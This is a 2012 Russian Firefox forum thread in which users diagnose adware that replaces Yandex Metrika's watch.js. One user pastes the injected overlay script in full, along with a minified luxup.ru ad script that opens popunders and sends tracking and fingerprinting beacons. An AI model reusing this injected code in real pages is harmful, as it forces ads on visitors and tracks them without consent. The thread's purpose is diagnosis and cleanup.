>Форум Mozilla Россия
   http://forum.mozilla-russia.org/index.php
>Проблемы с сайтами
   http://forum.mozilla-russia.org/viewforum.php?id=24
>Вредоносное рекламное ПО с сайта LUXUP.RU
   http://forum.mozilla-russia.org/viewtopic.php?id=57436

archie > 18-12-2012 17:40:59

Здравствуйте, пару дней назад появилась проблема.
При открытии разных сайтов, где раньше никогда не было рекламы, выскакивает рекламное окно. Вчера целый день выскакивала реклама marketgid, сегодня поменялось на "БЕСПЛАТНОЕ ТЕСТИРОВАНИЕ ОТ (название открываемого сайта)". На этом сайте выскочило то же самое окно.
Рекламное окно на javascript.
В других браузерах тоже самое.
Ось - вин хр.
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
Заранее спасибо за помощь.


Всем привет, немного разобрался в ситуации.

1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.

3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу  mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.

На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.

У кого какие мысли по этому поводу?


  Watch.js

скрытый текст
function f_filterResults(n_win, n_docel, n_body) {
    var n_result = n_win ? n_win : 0;
    if (n_docel && (!n_result || (n_result > n_docel)))
        n_result = n_docel;
    return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result;
}

function f_clientWidth() {
    return f_filterResults (
        window.innerWidth ? window.innerWidth : 0,
        document.documentElement ? document.documentElement.clientWidth : 0,
        document.body ? document.body.clientWidth : 0
    );
}
function f_clientHeight() {
    return f_filterResults (
        window.innerHeight ? window.innerHeight : 0,
        document.documentElement ? document.documentElement.clientHeight : 0,
        document.body ? document.body.clientHeight : 0
    );
}
function f_scrollLeft() {
    return f_filterResults (
        window.pageXOffset ? window.pageXOffset : 0,
        document.documentElement ? document.documentElement.scrollLeft : 0,
        document.body ? document.body.scrollLeft : 0
    );
}
function f_scrollTop() {
    return f_filterResults (
        window.pageYOffset ? window.pageYOffset : 0,
        document.documentElement ? document.documentElement.scrollTop : 0,
        document.body ? document.body.scrollTop : 0
    );
}

function popMove()
{
    popDiv = document.getElementById("popDiv");
    if(popDiv != null)
    {
        popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
        popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
    }
}

function popHide()
{
    popDiv = document.getElementById("popDiv");
    clearInterval(popMoveRun);
    popDiv.style.display = 'none';
    return false;
}

function popShowClose()
{
    popControl = document.getElementById("popControl");
    popControl.style.display = 'block';
}

if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
    var popMutex = true;
   
    var popDiv = document.createElement("div");
    popDiv.id = "popDiv";
    popDiv.style.position = "absolute";
    popDiv.style.width = "850px";
    popDiv.style.height = "550px";
    popDiv.style.backgroundColor = "white";
    popDiv.style.zIndex = "1000";
    popDiv.onclick = popShowClose;
    document.body.appendChild(popDiv);
   
    var advName = "DataMind";
    var popInfo = document.createElement("div");
    popInfo.id = "popInfo";
    popInfo.style.position = "absolute";
    popInfo.style.left = "10px";
    popInfo.style.fontSize = "11px";
    popInfo.style.fontWeight = "bold";
    popInfo.style.padding = "0 1px 25px";
    popInfo.style.height = "13px";
    popInfo.style.color = "black";
    popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
    popInfo.style.display = "block";
    popInfo.innerHTML = "&#1056;&#1077;&#1082;&#1083;&#1072;&#1084;&#1072; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1099; " + advName + " <font color=\"red\">&#1055;&#1086;&#1089;&#1077;&#1090;&#1080;&#1090;&#1077; &#1089;&#1072;&#1081;&#1090; &#1089;&#1087;&#1086;&#1085;&#1089;&#1086;&#1088;&#1072; &#1095;&#1090;&#1086;&#1073;&#1099; &#1087;&#1088;&#1086;&#1076;&#1086;&#1083;&#1078;&#1080;&#1090;&#1100; &#1087;&#1088;&#1086;&#1089;&#1084;&#1086;&#1090;&#1088; &#1089;&#1072;&#1081;&#1090;&#1072;</font>";
    popDiv.appendChild(popInfo);
   
    var popControl = document.createElement("div");
    popControl.id = "popControl";
    popControl.style.position = "absolute";
    popControl.style.right = "10px";
    popControl.style.display = 'none';
    popDiv.appendChild(popControl);
   
    var popControlClose = document.createElement("a");
    popControlClose.href = "#";
    popControlClose.onclick = popHide;
    popControlClose.style.fontSize = "11px";
    popControlClose.style.fontWeight = "bold";
    popControlClose.style.padding = "0 1px 25px";
    popControlClose.style.color = "#096";
    popControlClose.style.height = "13px";
    popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
    popControlClose.style.display = "block";
    popControlClose.innerHTML = "&#1047;&#1072;&#1082;&#1088;&#1099;&#1090;&#1100;";
    popControl.appendChild(popControlClose);
   
    var adDiv = document.createElement("div");
    adDiv.id = "lx_381874";
    adDiv.style.position = "absolute";
    adDiv.style.top = "15px";
    popDiv.appendChild(adDiv);
   
   
    var adScript = document.createElement("script");
    adScript.type = "text/javascript";
    adScript.language="JavaScript";
    adScript.charset = "utf-8";
    adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
    document.body.appendChild(adScript);
   
    var popMoveRun = setInterval (popMove, 10);
    setTimeout(popShowClose, 10000);
}


lb123811.js
скрытый текст
(function(){var j=!0,l=null,z=!1;function A(){return function(){}}function e(a){return parseInt(a,10)}function oa(){return 100*((new Date).getTime()%1E7)+Math.round(99*Math.random())}function g(a){return"undefined"!=typeof a}function H(a,b){b||(b=A());var c=n.createElement("script");c.setAttribute(pa,qa);c.setAttribute("src",a);if(g(c))w?c.onreadystatechange=function(){("loaded"==this.readyState||"complete"==this.readyState)&&setTimeout(b,0)}:c.onload=function(){setTimeout(b,0)},N.appendChild(c)}function O(a){var b=n.createElement("style");b.setAttribute("rel",
"stylesheet");b.setAttribute(pa,"text/css");N.appendChild(b);w?b.styleSheet.cssText=a:b.appendChild(n.createTextNode(a))}function ra(){var a=z,b=navigator,c=l;if(g(b.plugins)&&"object"==typeof b.plugins["Shockwave Flash"]){if((c=b.plugins["Shockwave Flash"].description)&&(!g(b.mimeTypes)||!b.mimeTypes["application/x-shockwave-flash"]||b.mimeTypes["application/x-shockwave-flash"].enabledPlugin))c=c.replace(/^.*\s+(\S+\s+\S+$)/,"$1"),a=[0,0,0],a[0]=e(c.replace(/^(.*)\..*$/,"$1")),a[1]=e(c.replace(/^.*\.(.*)\s.*$/,
"$1")),a[2]=/[a-zA-Z]/.test(c)?e(c.replace(/^.*[a-zA-Z]+(.*)$/,"$1")):0}else if(g(f.ActiveXObject))try{var d=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if(d&&(c=d.GetVariable("$version")))c=c.split(" ")[1].split(","),a=[e(c[0]),e(c[1]),e(c[2])]}catch(m){}return a=a!==z?a.join("."):a}function Qa(){var a=ra(),b="10.0.42".split(".");if(a===z)return z;a=a.split(".");b[0]=parseInt(b[0],10);b[1]=parseInt(b[1],10)||0;b[2]=parseInt(b[2],10)||0;return a[0]>b[0]||a[0]==b[0]&&a[1]>b[1]||a[0]==b[0]&&
a[1]==b[1]&&a[2]>=b[2]?a.join("."):z}function D(a,b,c){a.addEventListener?a.addEventListener(b,c,z):a.attachEvent("on"+b,c)}function Ra(a,b){a.innerHTML=b;for(var c=[],d=a.childNodes,m=0;d[m];m++)c&&d[m].nodeName&&"script"===d[m].nodeName.toLocaleLowerCase()&&(!d[m].type||"text/javascript"===d[m].type.toLowerCase())&&c.push(d[m].parentNode?d[m].parentNode.removeChild(d[m]):d[m]);for(var e in c){var d=c[e],m=d.text||d.textContent||d.innerHTML||"",f=n.createElement("script");f.type="text/javascript";
f.appendChild(n.createTextNode(m));N.insertBefore(f,N.firstChild);N.removeChild(f);d.parentNode&&d.parentNode.removeChild(d)}}function aa(){var a="",a="?rt="+oa();n.referrer&&(a+="&r="+escape(n.referrer));P&&(a+="&recurring=1");ba&&(a+="&flash="+escape(ba));w&&(a+="&isie=1");if(!f[h].popunderShow)for(var b in i)if(i.hasOwnProperty(b)&&"object"==typeof i[b]&&g(i[b].type)&&"popunder"==i[b].type){a+="&pu=1";break}a+="&f="+h;g(screen.width)&&(a+="&scr="+escape(screen.width+"x"+screen.height));return a+=
f[h].multishowsAdd?"&"+f[h].multishowsAdd:""}function Sa(a){for(var b=a.length,c=[],d=0;d<b;d++)c.push(a[d].l+";"+a[d].n.join(";"));ca&&H(ca+"?"+c.join("&"),A())}function Ta(){I&&(clearTimeout(I),I=l);for(var a=E.length,b=[],c=0;c<a;c++)if(E[c]){var d;a:{var m=E[c];if(m){var e=getElementsByClass("lx__tsb",m);d=[];for(var g=[],k=void 0,i=e.length,k=0;k<i;k++){var h;if(h=e[k])b:{h=e[k];if(!(0===h.offsetWidth||0===h.offsetHeight))for(var q=C&&!f.opera?s.clientHeight:u.clientHeight,o=C&&!f.opera?s.clientWidth:
u.clientWidth,r=h.getClientRects(),v=0,w=r.length;v<w;v++){var p=r[v],t=0<=p.left&&p.left+(p.width?p.width:p.right-p.left)<o,x;if(x=0<=p.top&&p.top+(p.height?p.height:p.bottom-p.top)<q){if(t){p=n.elementFromPoint((p.left+p.right)/2,(p.top+p.bottom)/2);if(p===h)p=j;else c:{if(p)for(p=p.parentNode;p!=l;){if(p==h){p=j;break c}p=p.parentNode}p=z}t=p}x=t}if(x){h=j;break b}}h=z}h&&(d.push(e[k].getAttribute("tsbid")),g.push(e[k]))}e=g.length;for(k=0;k<e;k++)h=g[k],h.className=h.className.replace(RegExp("(^|\\s)lx__tsb(\\s|$)",
"g"),"$1").replace(/\s+/g," ").replace(/(^ | $)/g,"");if(g=d.length){m=getElementsByClass("lx__tsbc",m);m=m[0];m=m.getAttribute("tsbc");d={n:d,all:i==g,l:m};break a}}d=z}if(d!==z){d.all&&delete E[c];i=d.n;m=[];g=0;k=i.length;a:for(;g<k;g++){e=0;for(h=m.length;e<h;e++)if(m[e]==i[g])continue a;m[m.length]=i[g]}b.push({n:m,l:d.l})}}b.length&&Sa(b)}function da(){I&&clearTimeout(I);I=setTimeout(Ta,1E3)}function sa(){t.demogr&&t.interests&&!t.sent&&H("http://"+S+"/set_li_stat/?sex="+t.sex+"&lage="+t.lage+
"&uage="+t.uage+"&interest="+t.interest,function(){t.sent=j})}function x(a,b){o.style[a]=b}function Ua(){f[b].bottomReady=function(a){a=e(a);o.childNodes[1].height=a+q;x("height",a+5+q)}}function ea(a){var b=a.toString(),b=b.substr(9),b=b.substr(0,b.indexOf("("));g(J[b])?(clearTimeout(J[b]),J[b]=setTimeout(function(){clearInterval(J[b]);a();delete J.C},ta)):(J[b]=setInterval(function(){a()},ta),a())}function ua(){ea(va)}function wa(){ea(T);w&&(ea(xa),setTimeout(T,250))}function xa(){x("width",s.clientWidth?
s.clientWidth:u.clientWidth)}function va(){fa(K,{bottom:j,right:j})}function T(){fa(o,{bottom:j})}function fa(a,b){var c=a.style;if(g(b[v])&&b[v]&&!g(a.d))a.d=e(a.currentStyle[v]),g(b[v])&&b[v]&&(c[v]=U);if(g(b.right)&&b.right&&!g(a.q)&&(a.q=e(a.currentStyle.right),g(b.right)&&b.right))c.right="";if(g(b.left)&&b.left&&!g(a.u))a.u=e(a.currentStyle.left);if(g(b[v])&&b[v])c.position=L,c.top=w?0-a.d-(e(c.height)?e(c.height):a.offsetHeight)+(s.clientHeight?s.clientHeight:u.clientHeight)+e(C&&!f.opera?
s.scrollTop:u.scrollTop)+q:0-a.d-e(c.height)+e(f.innerHeight)+e(f.pageYOffset)+q;if(g(b.right)&&b.right)c.position=L,C?c.right=a.q-(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q:c.left=0-a.q-(e(c.width)?e(c.width):a.offsetWidth)+(s.clientWidth?s.clientWidth:u.clientWidth)+(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q;if(g(b.left)&&b.left)c.position=L,c.left=a.u+e(C&&!f.opera?s.scrollLeft:u.scrollLeft)+q}function ya(){var a=n.getElementsByTagName("object"),b=n.getElementsByTagName("embed"),c={m:z,w:[],embeds:[]};
if(V)for(var d=0;d<a.length;d++){for(var e=z,f=a[d].getElementsByTagName("param"),h=0;h<f.length;h++)if("wmode"==f[h].getAttribute("name").toLowerCase()){e=j;break}if(e)c.m=j,c.w.push(a[d])}for(d=0;d<b.length;d++){a=b[d].getAttribute("wmode");if(!(e=!a))g(a)?(a=a.toLowerCase(),a="transparent"!=a&&"opaque"!=a?z:j):a=z,e=!a;if(e)c.m=j,c.embeds.push(b[d])}return c}function Va(){for(var a=ya(),b=a.w,a=a.embeds,c=0;c<b.length;c++){var d=n.createElement("param");d.setAttribute("name","wmode");d.setAttribute("value",
"transparent");b[c].appendChild(d);b[c].outerHTML=b[c].outerHTML}for(c=0;c<a.length;c++)a[c].setAttribute("wmode","transparent"),a[c].outerHTML=a[c].outerHTML}function Q(a){var b=a.which?a.which:a.button,a=(w?a.srcElement:a.target).nodeName.toLowerCase();if(("a"==a||"img"==a)&&2!=b&&3!=b)clearTimeout(ga),ga=setTimeout(function(){ga=l;za()},500)}function Wa(){var a="";if(F)for(var b in i)i.hasOwnProperty(b)&&"object"==typeof i[b]&&(a+=escape(b.substr(1))+";");0<a.length&&(a=a.substring(0,a.length-
1));return a}function Aa(a){Ba(a.target?a.target:a.srcElement)}function Xa(a){var b=/\/i\/(a??)(\d+?)\//m,c=b.exec(a),d=z;if(c!=l&&16!=c){d=e(c[2]);d=(2*(10*d+40)-40)/10;16<=d&&(d=16);var f=10*d+40,d=a.replace(b,"/i/$1"+d+"/")}return{url:d,size:f}}function Ca(a){var b=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollTop:u.scrollTop),c=e(b+(C&&!f.opera?s.clientHeight:u.clientHeight)),d=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollLeft:u.scrollLeft),g=e(d+(C&&!f.opera?s.clientWidth:u.clientWidth)),
h=a.getClientRects()[0],i=Math.round(h.top)+b,k=Math.round(h.bottom)+b,o=Math.round(h.left)+d,h=Math.round(h.right)+d;if(i<b)a.style.top=e(a.style.top)+(b-i)+W+q;if(k>c)a.style.top=e(a.style.top)-(k-c)-W+q;if(o<d)a.style.left=e(a.style.left)+(d-o)+W+q;if(h>g)a.style.left=e(a.style.left)-(h-g)-W+q}function ha(a,b){clearTimeout(a.getAttribute("enlargeTimer"));var c=Da(b),d=e(a.height)-y;a.width=e(a.width)-y;a.height=d;d=e(c.left)>e(a.style.left)?e(a.style.left)+y/2:e(a.style.left)-y/2;a.style.top=(e(c.top)>
e(a.style.top)?e(a.style.top)+y/2:e(a.style.top)-y/2)+q;a.style.left=d+q;e(a.width)>e(b.width)?a.setAttribute("shrinkTimer",setTimeout(function(){ha(a,b)},R)):(a.style.top="-100000px",a.style.left="-100000px",b.style.visibility="",b.parentNode.style.zIndex="")}function Ea(a,b){clearTimeout(a.getAttribute("shrinkTimer"));var c=e(a.height)+y;a.width=e(a.width)+y;a.height=c;c=e(a.style.left)-y/2;a.style.top=e(a.style.top)-y/2+q;a.style.left=c+q;Ca(a);e(a.width)<b&&a.setAttribute("enlargeTimer",setTimeout(function(){Ea(a,
b)},R))}function Da(a){for(var b=0,c=0;a&&"relative"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position&&"absolute"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position;)b+=e(a.offsetTop),c+=e(a.offsetLeft),a=a.offsetParent;return{top:b,left:c}}function Ba(a){var b,c=Da(a),d=Xa(a.src),e=d.size;if((d=d.url)||d!=a.src){a.previousSibling&&"img"==a.previousSibling.nodeName.toLowerCase()?b=a.previousSibling:(b=a.cloneNode(z),w&&b.detachEvent("onmouseover",Aa),b.style.position=L,b.style.top=
"-100000px",b.style.left="-100000px",b.style.margin="0px",n.addEventListener?b.addEventListener("mouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))},z):b.attachEvent("onmouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))}),a.parentNode.insertBefore(b,a));if(b.src==a.src){var f=b.cloneNode(z);D(f,"load",function(){b.src=f.src;setTimeout(function(){f.parentNode.removeChild(f)},
100)});f.src=d;b.parentNode.insertBefore(f,b)}b.width=a.width;b.height=a.height;b.style.top=c.top+q;b.style.left=c.left+q;a.style.visibility="hidden";a.parentNode.style.zIndex=1E5;Ca(b);b.setAttribute("enlargeTimer",setTimeout(function(){Ea(b,e)},R))}}function Ya(a,b){b&&(D(n,ia,Fa(a)),X&&(Y(a)(),D(f,"resize",Ga(a)),D(f,ia,Ga(a))));for(var c=getElementsByClass("close",a.a),d=c.length,e=0;e<d;e++)D(c[e],ja,Za(a));c=getElementsByClass("ref",a.a);d=c.length;for(e=0;e<d;e++)D(c[e],ja,Ha(a))}function Za(a){return function(b){if(b||
f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;a.s=j;ka(a);b=new Date;b.setTime(b.getTime()+36E5*$a);n.cookie="_lxretpopupignore=1; path=/; expires="+b.toUTCString()}}function Ha(a){return function(b){if(b||f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;clearTimeout(a.i);a.j=j;ka(a,function(){H(la+a.B+"/"+aa(),A())})}}function Fa(a){return function(){if(!a.s&&!a.j){var b=e(s.scrollTop?s.scrollTop:u.scrollTop);!a.k&&b>=a.v?ab(a):a.k&&b<a.v&&
ka(a)}}}function Y(a){return function(){a.a[a.b+"Offset"]=e(a.a.style[a.b]);var b={bottom:j};a.b==Ia&&(b[Ia]=j);a.b==Ja&&(b[Ja]=j);fa(a.a,b)}}function Ga(a){return function(){g(a.t)&&clearTimeout(a.t);a.t=setTimeout(Y(a),100)}}function Ka(a){var b=0;return b=X?a.a[a.b+"Offset"]:e(a.a.style[a.b])}function ab(a){a.k=j;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.i=setTimeout(Ha(a),1E3*a.refresh);a.a.style.display="block";a.c=setInterval(function(){var b=Ka(a),c=b+La;0>b&&0>c?(a.h=j,a.a.style[a.b]=
c+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=0+q);X&&Y(a)()},Ma)}function ka(a,b){a.k=z;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.c=setInterval(function(){var c=Ka(a),d=c-La;c>=-a.width&&d>-a.width?(a.h=j,a.a.style[a.b]=d+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=-a.width+q,a.a.style.display="none",g(b)&&b());X&&Y(a)()},Ma)}function za(a){if(!Z){Z=j;var b=Wa();b&&(a?(n.write('<scr'+'ipt type="'+qa+'" language="JavaScr'+'ipt" src="'+la+b+"/"+aa()+'"><\/scr'+'ipt>'),Z=z):H(la+b+"/"+aa(),function(){Z=
z}))}}var i={"_336612":{id:"lx_336612"},"_381874":{id:"lx_381874",A:!0}},h="__lxG123811__",B="__lxG__",G={},n=document,f=window,u=n.body,s=n.documentElement,N=function(){var a=n.getElementsByTagName("head")[0];if(a)return a;for(a=s.firstChild;a&&"#text"==a.nodeName.toLowerCase();)a=a.nextSibling;if(a&&"#text"!=a.nodeName.toLowerCase())return a;a=n.createElement("head");
s.appendChild(a);return a}(),$=navigator.userAgent.toLowerCase(),w=/msie/.test($)&&!/opera/.test($),bb=(navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],C="CSS1Compat"===n.compatMode,ma=/chrome/.test($),V=/opera/.test($),P=z,Z=z,ga=l,F=0,E=[],I=l,ba=ma?Qa():ra(),Na=z,K=l,o=l,ta=50,na=l,Oa=z,v="bottom",q="px",L="absolute",r={},qa="text/javascript",pa="type",U="auto",M="",Pa=z,ca="",W=3,y=10,R=10,Ja="right",Ia="left",ia="scroll",ja="click",$a=480,Ma=15,La=22,X=w&&(!C||
8>e(bb)&&C),S="luxup.ru",la="http://"+S+"/multishows/",J={},t={demogr:z,interests:z,sent:z};getElementsByClass=n.getElementsByClassName?function(a,b){return(b||document).getElementsByClassName(a)}:function(a,b){var c=(b||document).getElementsByTagName("*"),d=c.length,e=a.split(/\s+/),f=e.length,h=[],g,i;for(g=0;g<d;g++)for(i=0;i<f;i++)if(-1!=c[g].className.search("\\b"+e[i]+"\\b")){h.push(c[g]);break}return h};D(f,ia,da);G[h]={};G[h].g=function(){if(!M)return j;M+="?rnd="+oa()+(f[h].popunderAdd?"&"+
f[h].popunderAdd:"");var a=window;window.open(M,h+"popunder","toolbar=1,location=1,status=1, menubar=1,scrollbars=1,resizable=1");M="";a.focus();u.detachEvent?(u.detachEvent("onclick",G[h].g),u.releaseCapture()):(u.removeEventListener("click",G[h].g,j),u.removeEventListener("click",G[h].g));return j};g(f[h])||(f[h]={});g(f[b])||(f[b]={});f[h].closed=A();f[h].clicked=A();if(!g(f[h].popunderShow))f[h].popunderShow=z;if(!g(f[h].allLoaded))f[h].allLoaded=A();if(!g(f[h].popunderAdd))f[h].popunderAdd="";
if(!g(f[h].multishowsAdd))f[h].multishowsAdd="";f[b].demogr=function(a){t.sex=encodeURIComponent(a.gen);t.lage=encodeURIComponent(a.lage);t.uage=encodeURIComponent(a.uage);t.demogr=j;sa()};f[b].interests=function(a){t.interest=encodeURIComponent(a.hier_inter.join(","));t.interests=j;sa()};f[h].parser=function(a){E=[];for(var b in a)if(a.hasOwnProperty(b)){var c=a[b];if("cfg"==c.type)c.hasOwnProperty("realShowsUrl")&&(ca=c.realShowsUrl),c.hasOwnProperty("getLiData")&&setTimeout(function(){H("http://medianet.yadro.ru/hier_inter.txt",
A());H("http://medianet.yadro.ru/info.txt",A())},0);else if("counters"==c.type){if(c.hasOwnProperty("urls"))for(var d=0;d<c.urls.length;d++)(new Image).src=c.urls[d]}else if(g(i["_"+c.id])&&g(c.source)&&c.source){if((d=n.getElementById(i["_"+c.id].id))&&"html"==c.type)if(P||(O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),d.innerHTML=c.source,i["_"+c.id].f=j,getElementsByClass("lx__tsbc",d).length&&E.push(d),g(i["_"+c.id].A)&&i["_"+c.id].A)for(var m=d.getElementsByTagName("img"),
s=m.length,t=0;t<s;t++)n.addEventListener?m[t].addEventListener("mouseover",function(){Ba(this)},z):m[t].attachEvent("onmouseover",Aa);if(d&&"pu"==c.type&&!Pa)M="http://c."+S+"/pu/"+c.id+".html",n.addEventListener?u.addEventListener("click",G[h].g,j):(u.attachEvent("onclick",G[h].g),u.setCapture(j)),Pa=i["_"+c.id].f=j;if(d&&"js"==c.type)P||(g(c.style)&&O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),Ra(d,c.source),i["_"+c.id].f=j;if(d&&"flash"==c.type&&!Na)K=
d,O(c.style),f[h].closed=function(){K.parentNode.removeChild(K)},f[h].clicked=function(){K.parentNode.removeChild(K)},d.innerHTML=c.source,i["_"+c.id].f=j,w&&(f.attachEvent("onscroll",ua),f.attachEvent("onresize",ua),va()),Na=j,getElementsByClass("lx__tsbc",d).length&&E.push(d);if(d&&c.type==v)o=d,(V||ma)&&Oa&&g(i["_"+c.id].z)&&i["_"+c.id].z&&Va(),""!=c.style&&O(c.style),w?o.e=e(o.currentStyle[v]):(o.e=e(n.defaultView.getComputedStyle(o,l).bottom),V&&(o.e-=1)),f[b].bottomClosed=function(){var a=n.createElement("a");
a.innerHTML=".";a.href="medianet.adlabs.ru";o.appendChild(a);a.focus();a.blur();o.style.display="none";da()},x("position",L),x(v,U),x("top","-100000px"),x("zIndex",99999),f[b].bottomReady=function(a,b){a=e(a);if(150<a)return z;o.childNodes[1].height=a+q;x(v,"-"+(a+5+10)+q);x("top","");w?x("position",L):x("position","fixed");if(w){if(0!=b)xa(),clearInterval(na),f[b].bottomReady=A()}else f[b].bottomReady=A();na=setInterval(function(){var a=w&&g(o.d)?o.d:e(o.style[v]);if(a<o.e&&!(6.25>o.e-a)){if(x(v,
a+5+q),w)o.d=a+5,x(v,U),T()}else{clearInterval(na);x(v,o.e+q);if(w)o.d=o.e,x(v,U),T(),f.attachEvent("onscroll",wa),f.attachEvent("onresize",wa);setTimeout(Ua,100)}},25)},o.innerHTML=c.source,ba||setTimeout(function(){var a=0,a=w?o.offsetHeight:n.defaultView.getComputedStyle(o,l).height;f[b].bottomReady(e(a)-5,1)},250),i["_"+c.id].f=j;if(d&&"float"==c.type){m=z;P||(O(c.style),D(d,ja,Q));if(!g(r[k])){var k=c.id;r[k]=i["_"+k];r[k].B=k;r[k].a=d;r[k].k=z;r[k].s=z;r[k].h=z;r[k].i=0;r[k].j=z;m=j}r[k].a.innerHTML=
c.source;r[k].a.style[r[k].b]=-1E3+q;r[k].a.style.display="block";r[k].width=e(r[k].a.width?r[k].a.width:r[k].a.offsetWidth);r[k].a.style[r[k].b]=-r[k].width+q;Ya(r[k],m);if(r[k].j)r[k].j=z;Fa(r[k])();i["_"+c.id].f=j;getElementsByClass("retail__tsbc",d).length&&E.push(d)}}}for(var y in i)i.hasOwnProperty(y)&&!g(i[y].f)&&g(i[y].r)&&i[y].r();P=z;setTimeout(function(){f[h].allLoaded()},0);da()};(function(){for(var a in i)if(i.hasOwnProperty(a)&&"object"==typeof i[a]){var b=n.getElementById(i[a].id),
c=z;g(i[a].type)&&"float"==i[a].type&&-1!=n.cookie.indexOf("_lxretpopupignore=1")&&(c=j);if(!b||c)delete i[a];else if((V||ma)&&g(i[a].type)&&"bottom"==i[a].type)if(ya().m){if(Oa=j,!g(i[a].o)||g(i[a].o)&&!i[a].o)F+=1}else F+=1;else F+=1}})();(new Image).src="http://counter.yadro.ru/hit;Luxup?r"+escape(n.referrer)+("undefined"==typeof screen?"":";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?screen.colorDepth:screen.pixelDepth))+";u"+escape(n.URL)+";"+Math.random();(new Image).src="http://"+S+"/merge_gpsid/?t="+(new Date).getTime();za(0)})();

feas > 18-12-2012 18:07:18
archie пишет

Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.

обновитесь + новый профиль

18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.

archie > 18-12-2012 18:13:23
feas пишет
archie пишет

Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.

обновитесь + новый профиль

18-12-2012 18:07:38
Починка браузера. Перенос своих настроек на новый профиль.

Ну, я в принципе догадался, что зараза скорее всего где-то в файлах настройки. Просто никогда раньше такого не встречал, холельсь бы разобраться что это и где оно сидит.

18-12-2012 18:20:14
Кстати, забыл - примерно в это же время в %USERDIR%\aplication data появился какой-то эгзэшник что-то типа "20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил, потом просканировал папку пользователя - каспер ничего не нашел.

feas > 18-12-2012 18:39:48
archie пишет

"20lg16p1s.exe", который пытался связаться с сайтом по-моему lcogum dot net (его каспер нашел). я его удалил

молодец.
подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)
Что делать, если есть подозрение на заражение системы вирусами?
Ну и я доверяю этим парням, антивирусам http://skt.admyn.ru/more.php?tid=10

archie > 18-12-2012 18:49:41
feas пишет

подобные exe ещё стоит поискать в автозагрузке (msconfig в строке выполнить - соотв. вкладка)

Ну он собственно в автозагрузке и стоял, после удаления загружать больше нечего :)
Вопрос есть ли связь между ним и лисом, в других браузерах же все норм. Уже перерыл всю папку профиля лиса. По идее нужно искать какой-нибудь .js файл?

feas > 18-12-2012 18:52:17
archie пишет

По идее нужно искать какой-нибудь .js файл?

зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в [firefox] 3.6 больше необновляется ваша же безопасность. Аналогично и в [windows] ХР. Каспер видно тоже подвел.

archie > 18-12-2012 18:58:01
feas пишет

зачем? лучше проверьте осталась ли проблема? вирус просто воспользовался тем что в [firefox] 3.6 больше необновляется ваша же безопасность. Аналогично и в [windows] ХР. Каспер видно тоже подвел.

Проблема никуда не пропадала, тот эгзэшник я удалил еще позавчера, когда проблема только появилась, насчет заражения системы говорить преждевременно. повторяю проблема лишь в firefox, в остальных браузерах ее нет. Скорее всего где-то запускается какой-то сценарий javascript при работе в лисе

18-12-2012 19:06:04
Еще раз повторю, проблему локализировал на сколько смог :
1. Проявляется только в firefox.
2. При отключении javascript проблема исчезает.


Может кто-нибудь с этим сталкивался?

feas > 18-12-2012 20:04:58

папка chrome в ней userChrome.js - только так.
Папки профиля
тут список всех рабочих файлов - лишние как правило либо часть расширения либо то что ты ищешь.

gjurza > 19-12-2012 23:03:41

Такая же проблема... уже замучился... ни один антивирусник не ищет...

выскакивает тот баннер что написал ТС и еще "Бесплатное тестирование от сайта хххх"

кстати в опере тоже выскакивает...

foka > 19-12-2012 23:12:54

_http://www.toolbarcleaner.com/ позволяет удалить левое ПО, дополнения, но самостоятельно и осторожно. И Malwarebytes Anti-Malware удаляет автоматически всякие бяки.

gjurza > 20-12-2012 01:29:26
gjurza пишет

